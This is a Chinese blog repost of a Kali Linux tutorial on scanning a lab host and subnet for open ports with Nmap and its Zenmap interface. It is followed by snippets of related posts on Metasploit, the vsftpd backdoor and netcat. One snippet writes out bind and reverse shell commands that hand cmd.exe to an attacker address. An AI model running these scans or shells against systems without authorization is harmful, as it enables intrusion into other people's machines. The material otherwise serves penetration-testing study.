Kali-linux查看打开的端口

最新推荐文章于 2025-05-15 08:27:52 发布
转载 最新推荐文章于 2025-05-15 08:27:52 发布 · 1.2w 阅读 · 17 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/student-programmer/p/6727732.html
文章标签:

#操作系统 #运维 #数据库

本文介绍了如何使用Nmap和Zenmap工具进行端口扫描。包括全端口扫描、指定端口范围扫描及特定端口扫描的方法,并展示了如何通过Zenmap的图形界面进行操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

对一个大范围的网络或活跃的主机进行渗透测试,必须要了解这些主机上所打开的端口号。在Kali Linux中默认提供了Nmap和Zenmap两个扫描端口工具。为了访问目标系统中打开的TCP和UDP端口,本节将介绍Nmap和Zenmap工具的使用。

4.4.1 TCP端口扫描工具Nmap

使用Nmap工具查看目标主机192.168.41.136上开放的端口号。执行命令如下所示:

root@kali:~# nmap 192.168.41.136
Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-19 16:21 CST
Nmap scan report for www.benet.com (192.168.41.136)
Host is up (0.00022s latency).
Not shown: 996 closed ports
PORT     STATE  SERVICE
21/tcp    open   ftp
22/tcp    open   ssh
23/tcp    open   telnet
25/tcp    opne   smtp
53/tcp    open   domain
80/tcp    open   http
111/tcp   open   rpcbind
139/tcp   open   netbios-ssn
445/tcp   open   microsoft-ds
512/tcp   open   exec
513/tcp   open   login
514/tcp   open   shell
1099/tcp  open   rmiregistry
1524/tcp  open   ingreslock
2049/tcp  open   nfs
2121/tcp  open   ccproxy-ftp
3306/tcp  open   mysql
5432/tcp  open   postgresql
5900/tcp  open   vnc
6000/tcp  open   X11
6667/tcp  open   irc
8009/tcp  open   ajp13
8180/tcp  open   unknown
MAC Address: 00:0C:29:31:02:17 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

输出的信息显示了主机192.168.41.136上开放的所有端口,如22、53、80和111等。

1. 指定扫描端口范围

如果目标主机上打开的端口较多时,用户查看起来可能有点困难。这时候用户可以使用Nmap指定扫描的端口范围,如指定扫描端口号在1~1000之间的端口号,执行命令如下所示:

root@kali:~# nmap -p 1-1000 192.168.41.136
Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-19 16:27 CST
Nmap scan report for www.benet.com (192.168.41.136)
Host is up (0.00020s latency).
Not shown: 49 closed ports
PORT        STATE   SERVICE
21/tcp      open      ftp
22/tcp      open      ssh
23/tcp      open      telnet
25/tcp      opne      smtp
53/tcp      open      domain
80/tcp      open      http
111/tcp     open      rpcbind
139/tcp     open      netbios-ssn
445/tcp     open      microsoft-ds
512/tcp     open      exec
513/tcp     open      login
514/tcp     open      shell
MAC Address: 00:0C:29:31:02:17 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

输出的信息显示了主机192.168.41.136上端口在1~1000之间所开放的端口号。

2. 扫描特定端口

Nmap工具还可以指定一个特定端口号来扫描。

【实例4-2】使用Nmap工具指定扫描在192.168.41.*网段内所有开启TCP端口22的主机。执行命令如下所示:

root@kali:~# nmap -p 22 192.168.41.*

Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-21 09:44 CST
Nmap scan report for 192.168.41.1
Host is up (0.00029s latency).
PORT  STATE SERVICE
22/tcp closed ssh
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.41.2
Host is up (0.00032s latency).
PORT  STATE SERVICE
22/tcp closed ssh
MAC Address: 00:50:56:E9:AF:47 (VMware)

Nmap scan report for www.benet.com (192.168.41.136)
Host is up (0.00056s latency).
PORT  STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:31:02:17 (VMware)

Nmap scan report for 192.168.41.254
Host is up (0.00027s latency).
PORT  STATE  SERVICE
22/tcp filtered ssh
MAC Address: 00:50:56:E1:5E:75 (VMware)

Nmap scan report for 192.168.41.234
Host is up (0.000052s latency).
PORT  STATE SERVICE
22/tcp open ssh

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.81 seconds

输出的结果显示了192.168.41.*网段内所有开启22端口的主机信息。从输出的信息中可以看到,总共有五台主机上打开了22号端口。

使用Nmap工具还可以指定扫描端口22结果的输出格式。执行命令如下所示:

root@kali:~# nmap -p 22 192.168.41.* -oG /tmp/nmap-targethost-tcp445.txt

执行以上命令后输出的信息与第三步中输出的结果类似,这里就不再列举。但是执行该命令后,Nmap会将输出的信息保存到/tmp/ nmap-targethost-tcp445.txt文件中。

4.4.2 图形化TCP端口扫描工具Zenmap

Zenmap是Nmap官方推出的一款基于Nmap的安全扫描图形用户界面。它的设计目标是快速地扫描大型网络,当然也可以使用它扫描单个主机。下面将介绍Zenmap工具的使用。

启动Zenmap工具。在Kali图形界面依次选择“应用程序”|Kali Linux|“信息收集”|“DNS分析”|Zenmap命令,将打开如图4.2所示的界面。

图4.2 Zenmap起始界面

在该界面Target文本框中输入目标主机地址,在Profile文本框中选择扫描类型。设置完后,单击Scan按钮,扫描结果如图4.3所示。

图4.3 扫描界面

该界面显示了扫描192.168.41.*网段内所有主机启动的所有端口信息。在左侧栏中可以切换以主机或服务的形式分别显示详细扫描结果。在右侧栏中,可以分别查看Namp输出信息、端口/主机、拓扑结构、主机详细信息和扫描信息等。

转载于:https://www.cnblogs.com/student-programmer/p/6727732.html

如何查看自己已经开放的端口
mphoebus的专栏
10-31 2740
 当前最为常见的木马通常是基于TCP/UDP协议进行client端与server端之间的通讯的,既然利用到这两个协议,就不可避免要在server端(就是被种了木马的机器了)打开监听端口来等待连接。例: 例如鼎鼎大名的冰河使用的监听端口是7626,Back Orifice 2000则是使用54320等等。那么,我们可以利用查看本机开放端口的方法来检查自己是否被种了木马或其它hacker程序。以下
kali-Linux】DVWA搭建漏洞靶场_kali搭建dvwa靶场,详细讲解
2401_84138785的博客
04-18 1085
四轮技术面+一轮hr面结束,学习到了不少,面试也是一个学习检测自己的过程,面试前大概复习了 一周的时间,把以前的代码看了一下,字节跳动比较注重算法,面试前刷了下leetcode和剑指offer, 也刷了些在牛客网上的面经。大概就说这些了,写代码去了~祝大家都能收获大厂offer~篇幅有限,仅展示部分内容网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以添加V获取:vip1024c (备注前端)
Linux】如何查看端口开启了哪些?
weixin_36460584的博客
11-22 687
在命令窗口输入: netstat -tlnp。
kali开启端口,防火墙相关命令
qq_45955869的博客
07-12 4617
kali端口相关命令
kali实现nmap端口扫描指南
weixin_75042169的博客
05-15 1202
Kali Linux中的Nmap工具是进行端口扫描和网络探测的强大工具。首先,使用ifconfig命令确定Kali主机的IP地址。然后,通过Nmap对目标主机(如CentOS 9虚拟机)进行扫描。基本扫描命令为nmap 192.168.10.133,详细扫描可添加-vv参数。指定端口扫描(如SSH端口22)使用nmap -p 22 192.168.10.133。操作系统探测使用nmap -O 192.168.10.133。Nmap还支持扫描整个网段(nmap -sP 192.168.10.*)和脚本扫描(n
kali
cyy001128的博客
08-29 2567
简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用。
kali linux 打开端口,Linux kali开启端口、关闭防火墙方法
weixin_35950531的博客
04-30 7639
一、首先需要安装ufw命令# apt-get install ufw二、ufw命令使用实例如下:检查防火墙的状态(默认 inactive) # ufw status防火墙版本 # ufw version启动ufw防火墙 # ufw enable关闭uf...
使用kali-linux通过笑脸漏洞获取目标靶机最高权限
qq_51650968的博客
11-03 4756
使用kali-linux通过笑脸漏洞获取目标靶机最高权限 1,首先启动并登陆一个充满漏洞的靶机Metasploitable2 (Linux) 登陆账号密码都默认为:msfadmin 进去之后了解靶机的ip地址 通过nmap对靶机ip地址进行扫描 我们可以发现21端口打开的 我们尝试扫描该端口的版本 如图这正是有笑脸漏洞的vsftpd的版本、 查看6200端口情况 我们可以看到第一次用nmap 对6200端口扫描时 该端口是封闭的 连接21端口并通过笑脸漏洞登录 打开一个新的控制台 使用指令 nc
kali-linux中用set配置克隆网站
最新发布
05-29
好的,我现在需要帮助用户在Kali Linux中使用SET工具配置和克隆目标网站。首先,我得回忆一下SET工具的基本使用流程,并结合用户提供的引用内容来确保准确性。用户的问题明确,要在Kali中使用SET克隆网站。根据引用...
Kali-linux渗透攻击应用
2301_77162959的博客
05-17 2641
前面依次介绍了Armitage、MSFCONSOLE和MSFCLI接口的概念及使用。本节将介绍使用MSFCONSOLE工具渗透攻击MySQL数据库服务、PostgreSQL数据库服务、Tomcat服务和PDF文件等。
kali-linux远程控制
m0_73408920的博客
04-15 2225
本次实验会按照以下主题来介绍kali linux中的远程控制。@ 为什么6200端口变成了一个“后门”@ 远程控制程序基础@ 如何使用MSFPC生成被控端。@ 如何在kali linux 2中启动主控端。@ meterpreter在各种操作系统中的应用。远程控制是指管理人员在异地通过计算机网络异地拨号或双方都接入Internet等手段,连通需被控制的计算机,将被控计算机的桌面环境显示到自己的计算机上,通过本地计算机对远方计算机进行配置、软件安装程序、修改等工作。
Linux 打开端口
YJ_VS_GY的专栏
05-07 755
1. 开放端口命令: /sbin/iptables -I INPUT -p tcp --dport 8080 -j ACCEPT 2.保存:/etc/rc.d/init.d/iptables save 3.重启服务:/etc/init.d/iptables restart
445端口的简单利用
热门推荐
FNjoker的博客
07-22 1万+
445端口的简单利用 前期准备 1.windows10主机一台 2.kali虚拟机一台 3.win7虚拟机一台 4.CobaltStrike4.0 5.将win7虚拟机的445端口开放 简单思路说明 本次实验的目的就是测试一下在靶机开了445端口的情况下如何利用。 实验的思路是在测试到对方主机445端口开放的情况下,利用ipc$建立连接,之后将后门程序上传上去。 实验开始 在win10上输入命令:telnet 192.168.137.129 445 测试一下靶机的445端口的开放情况。 在通的情况下输入如下
Linux kali开启端口方法
sinat_39665351的博客
07-21 5627
安装ufw apt-get install ufw 源博 http://mrdede.com/?p=1177
Linux端口查看以及开启
dengcelu4919的博客
07-28 418
ps -aux | grep 8080 使用命令:netstat –apn 查看所有的进程和端口使用情况。发现下面的进程列表,其中最后一栏是PID/Program name 发现8080端口被PID为9658的Java进程占用。 进一步使用命令:ps -aux | grep java,或者直接:ps -aux | grep pid 查看 就可以明确知道8080端...
kali如何开放端口
single_g_l的博客
03-06 1万+
安装ufw apt-get install ufw ufw命令使用: 检查防火墙的状态(默认 inactive)$ ufw status 防火墙版本 $ ufw version 设置 启动ufw防火墙 $ ufw enable 默认禁止访问所有 $ ufw default deny 上面两条一定要做,之后需要开哪个端口再用下面方法开启某个端口 开放6379端口(redis) $ ufw all...
史上最全网络端口号大全,网络工程师必备!
TianYao
11-04 9257
一、端口概念 在网络技术中,端口(Port)大致有两种意思: 一是物理意义上的端口,比如,ADSL Modem、集线器、交换机、路由器用于连接其他网络设备的接口,如RJ-45端口、SC端口等等。 二是逻辑意义上的端口,一般是指TCP/IP协议中的端口端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等等。 二、网络端口的分类 按端口号可分为3大类: (1)公认端口(Well-KnownPorts):范围从0到1023 (2)动态端口(Dynamic Port
记录一次体验kali渗透工具MSF以及msfconsole命令详解
ch_ycc的博客
04-22 6808
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用。
如何在kali系统打开22端口
weixin_43635067的博客
12-11 8895
今天准备使用FileZilla从虚拟机里面的kali系统下载文件,然后发现连接不了,我猜测是22端口没有打开,然后我去打开端口,果然就可以连接了,接下来就来讲讲如何在kali系统中打开22端口。关闭自启动的命令为update-rc.d ssh disable。
kali-Linux中使用Netcat工具对windows10系统之间进行正向绑定和反向绑定;
12-27
### 使用Netcat在Kali Linux中对Windows 10系统进行正向绑定和反向绑定 #### 正向绑定Shell 对于正向绑定Shell,在目标Windows 10机器上,需要先启动一个监听服务并将命令解释器绑定到指定端口。然而,由于Windows本身并不自带Netcat工具,因此需预先安装Netcat[^1]。 一旦完成上述准备工作: - **在Windows 10(作为服务器)执行**: 打开命令提示符并输入以下指令来创建一个监听实例,并将cmd.exe绑定至特定端口(例如4444),等待来自外部的连接请求。 ```batch C:\> nc -nvlp 4444 -e cmd.exe ``` - **在Kali Linux(作为客户端)执行**: 接着,在Kali Linux终端里通过下面这条语句尝试去连接那个开放了4444端口的目标主机IP地址。 ```bash $ nc <Target_IP_Address> 4444 ``` 当成功建立连接之后,就可以远程控制这台运行Windows操作系统的计算机了。 #### 反向绑定Shell 而针对反向绑定Shell的情况,则是在攻击者的机器——这里指的是Kali Linux上面开启监听模式;相反地,让受害方即Windows 10主动发起连接动作给定好的端口号。 - **在Kali Linux(作为接收者/监听者)准备接受连接** 需要在Kali Linux环境中提前布置好监听环境,假设使用的端口也是4444的话,那么对应的命令应该是这样的形式: ```bash $ nc -lvnp 4444 ``` - **在Windows 10(作为发送者/连接发起者)触发连接行为** 同样地,在已经配置好了Netcat软件的前提下,于Windows侧下达如下所示的命令字符串,用来指示其向位于公网中的某一台VPS或者局域网内部其他位置上的Kali Linux发出连接申请。 ```batch C:\> nc <Attacker_IP_Address> 4444 -e cmd.exe ``` 这样就实现了由受害者设备向操控平台回传交互式的命令行界面的效果。 需要注意的是,实际应用场景当中应当遵循法律法规的要求合理合法地运用此类技术手段,严禁用于非法入侵他人信息系统的行为之中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值